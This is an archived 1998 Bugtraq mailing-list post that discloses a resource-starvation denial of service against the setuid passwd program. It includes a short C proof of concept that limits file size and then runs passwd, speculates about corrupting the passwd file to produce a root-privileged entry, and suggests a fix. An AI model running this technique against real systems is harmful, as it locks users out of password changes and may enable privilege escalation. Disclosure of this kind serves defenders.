Bugtraq mailing list archives
resource starvation against passwd(1)
From: ant () NOTATLA DEMON CO UK (Antonomasia)
Date: Sun, 22 Feb 1998 17:18:11 GMT
Standard apology if old... This demonstrates a resource starvation attack on the setuid root passwd(1) program. In the case I tested it was the Red Hat Linux passwd-0.50-7 program without shadowing. #include <stdio.h> #include <sys/time.h> #include <stdlib.h> #include <unistd.h> #include <sys/resource.h> main () { struct rlimit rl, *rlp; rlp=&rl; rlp->rlim_cur=4000 ; rlp->rlim_max=4000 ; setrlimit(RLIMIT_FSIZE, rlp); execl("/usr/bin/passwd", "passwd", (char *) 0); } The resource being restricted is filesize, and if the passwd file is large enough it cannot be written back and the passwd program dies. This leaves the passwd file locked against further password changes - a denial of service attack. I was unable to write back an incomplete passwd file during my tests, but I can imagine some systems allowing this, in which case you could aim for an incomplete last line like this myname:my-epw: which could be awkward if any authentication programs interpret it as myname:my-epw:0:0::/:/bin/sh A suggested fix is for the passwd program to be aware of the size of the file before writing, and to quit if failure is predicted. There are obviously other resources that could be restricted, and there may be a case for increasing limits on cpu time or file descriptors, or even filesize to ensure successful completion. -- ############################################################## # Antonomasia ant () notatla demon co uk # # See http://www.notatla.demon.co.uk/ # ##############################################################
Current thread:
- Fw: tetex-0.4pl8 world-writable database Micha? Zalewski (Feb 20)
- Re: Fw: tetex-0.4pl8 world-writable database Marcin Cieslak (Feb 20)
- Pipe attack - an example Micha? Zalewski (Feb 20)
- cfs-1.4.0beta2 root exploitable bug ther (Feb 20)
- WinGate DoS Matt Carothers (Feb 21)
- Quick update on Radius bug Phillip R. Jaenke (Feb 21)
- Workaround for radius bug Phillip R. Jaenke (Feb 21)
- Re: cfs-1.4.0beta2 root exploitable bug ther (Feb 21)
- resource starvation against passwd(1) Antonomasia (Feb 22)
- RADIUS (Summary) Aleph One (Feb 22)
- Re: RADIUS (Summary) Dave Stewart (Feb 22)
- Re: RADIUS (Summary) Phillip R. Jaenke (Feb 22)
- Re: RADIUS (Summary) Josh Richards (Feb 22)